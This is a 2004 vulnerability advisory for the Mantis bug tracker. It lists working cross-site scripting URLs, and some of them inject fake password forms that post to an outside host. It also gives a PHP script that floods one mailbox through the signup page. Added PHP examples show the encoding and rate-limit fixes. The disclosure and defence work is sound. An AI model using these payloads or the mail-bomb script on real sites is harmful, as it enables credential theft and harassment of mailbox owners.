
| Subject: | Multiple Vulnerabilities in Mantis Bugtracker |
|---|---|
| Date: | 20 Aug 2004 22:26:36 -0000 |
---------------------------------------------------------------------------
Multiple vulnerabilities in Mantis Bugtracker
---------------------------------------------------------------------------
Author: Joxean Koret
Date: This year, 2004 :) between June and August
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mantis Bugtracker
Mantis is a web-based bugtracking system. It is written in the PHP scripting language and requires the MySQL database and a webserver.
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Multiple Cross Site Scripting Vulnerabilities:
A1. The first vulnerability that I found is this: you can log in anonymously and, when you want to perform a privileged action, you need to re-login with any valid user. The previous URL is passed as the return parameter to the login_page.php script. This parameter is not correctly sanitized when showing/parsing and we can put any html/script code that we want. To try the first vulnerability, copy the following text and paste it in the location bar of your favourite web browser:
http://<site-with-mantis-bugtracker>/login_page.php?return=%22%3E%3Ch1%3EHello!%3C/h1%3E%3Cform%20action=%22http://malicious.site.com/script.xxx%22%3EPlease%20type%20your%20password%20:%20%3Cinput%20type=%22password%22%20name=%22your_password%22%3E%3Cbr%3E%3Cinput%20type=%22submit%22%20value=%22Give%20me%20your%20password,%20please...%22%3E%3C/form%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr
A2. Register New User XSS Vulnerability
- The second XSS problem is in the script signup.php (for example, http://bugs.mantisbt.org/signup.php). This script registers a new user. The problem is that the script doesn't sanitize properly the passed e-mail when showing/parsing. Now we have the second XSS problem that I found. To test it, please follow these steps:
- Navigate to http://<site-with-mantis-bugtracker>/signup_page.php
- In the username field type any username that you want
- In the e-mail field type this text: <iframe src=http://www.playboy.com></iframe> or <h1>Hi!</h1>
A3. Select Project XSS Vulnerability
------------------------------------
- I will not explain the problem because it is the same every time. Try the following URL please:
http://<site-with-mantis-bugtracker>/login_select_proj_page.php?ref=%3Cbr%3E%3Cform%20action=%22http://my.fucking.site/xxx.sss%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3EUsername:%3C/td%3E%3Ctd%3E%3Cinput%20type=text%20name=user%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20type=password%20name=pass%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20colspan=2%3E%3Cinput%20type=submit%20%20value=%22login%22%20onclick=%22javascript:alert('hi')%22%3E%3C/td%3E%3C/tr%3E%3C/form%3E
A4. Another XSS Vulnerability
- Try the following URL:
http://<site-with-mantis-bugtracker>/view_all_set.php?type=1&reporter_id=5031&hide_status=80<script>alert('hi')</script>
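All four findings in section A share one root cause: a request value (the return URL, the ref value, the e-mail address, a query parameter) is written back into the page without being encoded for its HTML context. The following is an added example, not code from Mantis or from the advisory author, showing the vulnerable attribute-echo pattern next to two fixes: output encoding with htmlspecialchars(), and an allowlist check that a return target is a relative page on the same site. The function names, the default page name and the sample inputs are assumptions constructed for the demo.

```php
<?php
// Added example, not Mantis code: the pattern behind A1-A4 is a request
// value (return, ref, the e-mail address) written into HTML without
// encoding. Function names and the default page are assumptions.

// Vulnerable: the value lands inside a double-quoted attribute, so a value
// that starts with "> closes the attribute and the tag, and the rest is
// parsed as markup (this is what the %22%3E prefix in the A1 URL relies on).
function render_return_field_vulnerable(string $return): string
{
    return '<input type="hidden" name="return" value="' . $return . '">';
}

// Fix 1: encode for the HTML attribute context. ENT_QUOTES covers both
// quote styles, so the same helper is safe in text and attribute positions.
function html_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_return_field_safe(string $return): string
{
    return '<input type="hidden" name="return" value="' . html_attr($return) . '">';
}

// Fix 2 (defence in depth for return/ref): accept only a relative page name
// with a simple query string; anything else falls back to a fixed page.
// Absolute URLs, "//host", "..", quotes and angle brackets all fail the test.
function safe_return_path(string $return, string $default = 'view_all_bug_page.php'): string
{
    if (strlen($return) > 512
        || strpos($return, '..') !== false
        || !preg_match('#^[A-Za-z0-9_\-]+\.php(\?[A-Za-z0-9_=&%.\-]*)?$#', $return)) {
        return $default;
    }
    return $return;
}

// Constructed inputs: a decoded value in the shape of the A1 URL's return
// parameter, the A2 e-mail payload, and a legitimate return target.
$samples = [
    '"><h1>Hello!</h1><form action="http://malicious.site.com/script.xxx">',
    '<iframe src=http://www.playboy.com></iframe>',
    'view_bug_page.php?bug_id=12',
];
foreach ($samples as $s) {
    echo "input:      $s\n";
    echo "vulnerable: " . render_return_field_vulnerable($s) . "\n";
    echo "encoded:    " . render_return_field_safe($s) . "\n";
    echo "validated:  " . safe_return_path($s) . "\n\n";
}
```

Run it with `php` on the command line. The encoded line is the actual XSS fix and applies to every place a request value is printed, the e-mail in A2 included; the allowlist is a separate control that keeps return and ref from being pointed at another host at all, which matters because the A1 and A3 payloads are phishing forms posting to an outside site.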
----------------------------------------------
B. Possible E-Mail Bomber.
- That's fun! We can create a simple program to send too many e-mails to the same e-mail address by simply changing the username. For example:
1.- Navigate to http://<site-with-mantis-bugtracker>/signup_page.php
2.- In the username field type test0
3.- In the e-mail field type test@test.com
4.- Send it.
1.- Navigate to http://<site-with-mantis-bugtracker>/signup_page.php
2.- In the username field type test1
3.- In the e-mail field type test@test.com
4.- Send it.
If you want to try the problem you can use the following simple script:
======================================================================
mantis-email-bomber.php
<?php
// Please change it because it is my e-mail :)
$email = "anyemail@address";
$base_user = "test";
$i = 0;
// Host name only; the scheme is added when the URL is built below
$site = "<site-with-mantis-bugtracker>";
for ($i = 0; $i <= 15; $i++)
{
    echo("Sending e-mail number $i\n");
    // A different username each time, always the same e-mail address
    $user = "$base_user$i";
    echo("New user is $user\n");
    $url = "http://$site/signup.php?username=$user&email=$email";
    echo("URL is $url\n");
    // Requests the signup page over HTTP (needs allow_url_fopen enabled)
    $fd = fopen($url, "r");
    if ($fd === false) {
        echo("Request $i failed\n");
        continue;
    }
    echo("E-mail $i sent\n");
    fclose($fd);
}
?>
======================================================================
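The script above works because signup.php mails the supplied address once per submitted username, with no limit on how often one address (or one client) may register. The following is an added example, not Mantis code, of the checks a signup handler can run before it sends the confirmation mail: reject addresses that are not syntactically valid, then cap signups per address and per client within a time window. The limits, the window, the in-memory attempt log (standing in for a database table) and the replay of the advisory's loop are constructed assumptions; it needs PHP 7.1 or later for the array destructuring.

```php
<?php
// Added example, not Mantis code: checks a signup handler can run before it
// sends a confirmation mail, so that re-submitting the form with a new
// username each time cannot be used to flood one mailbox. Limits, window
// and the in-memory log are assumptions standing in for a DB table.

const SIGNUP_WINDOW_SECONDS = 3600;  // assumed: count attempts over one hour
const SIGNUP_MAX_PER_EMAIL  = 3;     // assumed: at most 3 mails per address per window
const SIGNUP_MAX_PER_IP     = 5;     // assumed: at most 5 signups per client per window

// $log: list of past attempts, each ['email' => ..., 'ip' => ..., 'time' => unix ts].
// Returns [allowed, reason].
function signup_allowed(string $email, string $ip, array $log, int $now): array
{
    // Reject anything that is not a syntactically valid address first; this
    // also keeps the A2 payload (it has no "@") from ever reaching a mailer.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return [false, 'invalid e-mail address'];
    }
    $email = strtolower($email);
    $since = $now - SIGNUP_WINDOW_SECONDS;
    $byEmail = 0;
    $byIp = 0;
    foreach ($log as $entry) {
        if ($entry['time'] < $since) {
            continue;                          // outside the window
        }
        if (strtolower($entry['email']) === $email) {
            $byEmail++;
        }
        if ($entry['ip'] === $ip) {
            $byIp++;
        }
    }
    if ($byEmail >= SIGNUP_MAX_PER_EMAIL) {
        return [false, 'too many signups for this address'];
    }
    if ($byIp >= SIGNUP_MAX_PER_IP) {
        return [false, 'too many signups from this client'];
    }
    return [true, 'ok'];
}

// Constructed replay of the advisory's loop: 16 signups test0..test15, all
// with test@test.com, from one client, one second apart. Every attempt is
// logged, allowed or not, so refused attempts still count towards the caps.
$log = [];
$sent = 0;
for ($i = 0; $i <= 15; $i++) {
    $now = 1000 + $i;
    [$ok, $why] = signup_allowed('test@test.com', '198.51.100.7', $log, $now);
    $log[] = ['email' => 'test@test.com', 'ip' => '198.51.100.7', 'time' => $now];
    if ($ok) {
        $sent++;                               // here the real handler would mail
    }
    printf("test%-2d %s\n", $i, $ok ? 'mail sent' : "refused: $why");
}
echo "confirmation mails sent: $sent of 16\n";
```

With the assumed limits the replay sends three mails and refuses the remaining thirteen. Two details matter when wiring this into a real handler: the refusal should return the same generic "check your mailbox" page as a success, so the limit does not become an oracle for which addresses are registered, and an address that is already registered should be treated the same way rather than mailed again.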
---------------------------------------------------------------------------
The fix:
~~~~~~~~
The vendor has been contacted and all the bugs are corrected in the CVS version at the sourceforge.net site.
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es